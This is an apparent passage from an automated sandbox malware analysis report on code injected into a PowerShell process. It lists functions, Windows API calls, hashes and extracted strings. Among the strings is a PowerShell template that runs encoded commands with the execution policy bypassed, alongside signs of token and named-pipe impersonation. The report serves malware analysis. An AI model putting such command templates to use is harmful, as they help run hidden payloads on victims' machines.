                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                                                    • String ID: VUUU
                                                    • API String ID: 632458648-2040033107
                                                    • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                    • Instruction ID: e9f5f054d17b13a76e91c9c0cc10bf645e20ef4b47ab82f0f52074734a7c5b33
                                                    • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                                    • Instruction Fuzzy Hash: 37A1F42670066066FF14EBE6EA593AD2291BB8D7C1F824025ED495FFF6DE3CC505A310
                                                    Function 0000022EF9B1E004 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf
                                                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                                    • API String ID: 3512837008-1250630670
                                                    • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                    • Instruction ID: 2c3fe712bfefbce3c0b0fef6ce5f3d6611d96ed12f1da5acd5054f8fc42777ab
                                                    • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                                    • Instruction Fuzzy Hash: FF818C32600B84A5EF25DFA5DAA83D937A0F7A4784F464126DA8D03B99DF38C545E708
                                                    Function 0000022EFA0C1478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                                    • String ID: %s as %s\%s: %d
                                                    • API String ID: 3435635427-816037529
                                                    • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                    • Instruction ID: 76c73ae3a1af3ec4d2e66ba9eac83a4d9e5f7ce08d6fdfa30b900a834352b0a9
                                                    • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                                    • Instruction Fuzzy Hash: 40515932204B8196EA60DB56F99875AB7A5F789B80F054025EE898BF6ADF3CC055DB00
                                                    Function 0000022EF9B20A94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                                    • String ID: mode
                                                    • API String ID: 1756087678-2976727214
                                                    • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                                    • Instruction ID: 16411d9630c4d4155a4210e0bd83e1825026cadf346ba391e05b58ef8e233970
                                                    • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                                    • Instruction Fuzzy Hash: 0141F621304240A2EF25EB92A63D3A97351F7E8BD0F528125AE9E07FD6DE3CC5419B08
                                                    Function 0000022EF9B28620 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                    • String ID: /'); %s
                                                    • API String ID: 761449704-1283008465
                                                    • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                                    • Instruction ID: 877a307086af4afeed53347a6524cb185654bc7b9780a231ff635e72413e8f5e
                                                    • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                                    • Instruction Fuzzy Hash: 4031A11120028125EE3B9FA76E383A56B51B776FD0F4A8121DEE507FA6CB38C442B318
                                                    Function 0000022EFA0CE98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$OpenProcessToken
                                                    • String ID:
                                                    • API String ID: 2009710997-0
                                                    • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                    • Instruction ID: 03d94992a3ae72ea466c6fb797f3e65b8eedb150cb5f60ac6967b8558da15d14
                                                    • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                                    • Instruction Fuzzy Hash: 1F31B425704701A6FF149BE2F69875A67A1EB8CF90F164038AA458BFB6DE3CC445BB40
                                                    Function 0000022EF9B2F210 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2917016420-0
                                                    • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                    • Instruction ID: 2ebe1e40e5214eab50b005d072890bc01db234cda7c889dce1a58a24a82680c0
                                                    • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                                    • Instruction Fuzzy Hash: C8312661700B00A2FF319FE69A2832D67D5EBA6B91F564224EE8947FD5DF3CC000A308
                                                    Function 0000022EF9B3EFD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3191669884-0
                                                    • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                    • Instruction ID: ce831bb16d0a7389648152f731d7bcc5e6e5ad9f6d6f072be8502b81ced21420
                                                    • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                                    • Instruction Fuzzy Hash: 02318D72304784A5FE30DF969658B9DB6A4E764FE1F168121EA9403F85CB74C841A704
                                                    Function 0000022EFA0DFBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3191669884-0
                                                    • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                    • Instruction ID: 7343c49ab22b2b13b5b15b93ce993aac7d1db3bfbf63e65f01c1d23ab9afe405
                                                    • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                                    • Instruction Fuzzy Hash: 08314F73304784A5EB209F91E68875DB6A4F74CBE4F569121AE580BFA5CF38C851E710
                                                    Function 0000022EFA0C596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountTickioctlsocket
                                                    • String ID:
                                                    • API String ID: 3686034022-0
                                                    • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                    • Instruction ID: 45c1ca25f4d7b135b49c5cc18677680f2384c90284a63fde4e6c49ca93117585
                                                    • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                                    • Instruction Fuzzy Hash: A811C421200A8567FF108BE5F98C359A360E78CB64F520264DA498AFF0DFBCD889B710
                                                    Function 0000022EFA0C0AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                                                    • String ID:
                                                    • API String ID: 4232080776-0
                                                    • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                                    • Instruction ID: 858477b128a2e62099544fec214b1ff0ff885e2c951272a546a0fff84645afef
                                                    • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                                    • Instruction Fuzzy Hash: 59215E22610A46B5FF50DFA1FA8C76A2361F78CB44F86411698094EFB6DF2CC448F719
                                                    Function 0000022EF9B2FF10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                    • String ID:
                                                    • API String ID: 2328795619-0
                                                    • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                                    • Instruction ID: e0ea1f62ba13c7096fb9ca4677ecff570a969a08c26ef40074ce437bd764c3f9
                                                    • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                                    • Instruction Fuzzy Hash: BE515821705644B2FE39CAE75728B6A6680FB65FF4F164710AEB943FC5CB34C481AA48
                                                    Function 0000022EFA0D0B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                    • String ID:
                                                    • API String ID: 2328795619-0
                                                    • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                    • Instruction ID: b00b72c391151923ef0566c4282dcf2a1cb6d156646da05541ba6b8c6bcc5063
                                                    • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                    • Instruction Fuzzy Hash: 51510523708250A6FE248EA677087697590B748BF8F164715AE3E4BFF9CF3CD491A244
                                                    Function 0000022EF9B21030 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$freemalloc$_callnewh
                                                    • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                                                    • API String ID: 2029259483-317027030
                                                    • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                    • Instruction ID: 00142f7683465f5d0d4d930a9eff918b74e7ff4eafd750fc365b27d5ae084290
                                                    • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                    • Instruction Fuzzy Hash: EE61D131708750A6EF30DFA5E5692ADB7A1F3A4B80F414015EA8943F99EF78C505EB44
                                                    Function 0000022EFA0DA348 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 445582508-0
                                                    • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                    • Instruction ID: 884e473842cff5a4f725d7351be52e332e21c5968be0a32746cdc2ef803b1a1b
                                                    • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                    • Instruction Fuzzy Hash: FE51DF7362074092EF208F50E64836AB7A5F788B58F1A4525DA494BFF4DF7CC851E700
                                                    Function 0000022EFA0C1694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                                    • String ID:
                                                    • API String ID: 3587854850-0
                                                    • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                    • Instruction ID: 7b73c8daa62fdac81b29f6645bd09d28ebea348c28f69b66821d82f42bfce8f5
                                                    • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                    • Instruction Fuzzy Hash: 5741852231464062EE14EB92F6697AEA251BBCCBD0F428125AE5E4FFF6DE3CC505D700
                                                    Function 0000022EFA0C5C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                                    • String ID:
                                                    • API String ID: 3426420785-0
                                                    • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                    • Instruction ID: c729edeaff53e705cca544162a365f726524389a5a38e86db7e43de6e33e890a
                                                    • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                    • Instruction Fuzzy Hash: 32416D62710611B5FF10EBF1EA9D7D923A4AB9C794F424411EE098BFB6DE3CC50AA710
                                                    Function 0000022EFA0C6F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                                    • String ID:
                                                    • API String ID: 2310505145-0
                                                    • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                    • Instruction ID: 04d96e3dac9689a320e8f9714ac4842490b8cf50cb9f2f1e4702e4843cb029ec
                                                    • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                    • Instruction Fuzzy Hash: 3D416272210680E2FF108FA5F64871A77A1F78C794F264225EA995BFB4DB3CD491EB00
                                                    Function 0000022EFA0C79C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                                    • String ID:
                                                    • API String ID: 1014270282-0
                                                    • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                    • Instruction ID: 4f0ddad8d448d0b8360db552f46772af0e4f9d785f52735e7d11b11e93a0d8f5
                                                    • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                    • Instruction Fuzzy Hash: 27416F3261478097EF20DF92E54839977A1F78CFD8F094529AA494BFA5DB7CC605AB00
                                                    Function 0000022EF9B2FA20 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                    • String ID:
                                                    • API String ID: 1547050394-0
                                                    • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                    • Instruction ID: d0a4925a0e120e114a9808fc31d7ef8836a28285a831ed3026d1422349fbed13
                                                    • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                    • Instruction Fuzzy Hash: A8212761308786B1FF329BA39A2D75EA295F765BC0F464421DEC887F86DB7CC400A708
                                                    Function 0000022EFA0D0620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                    • String ID:
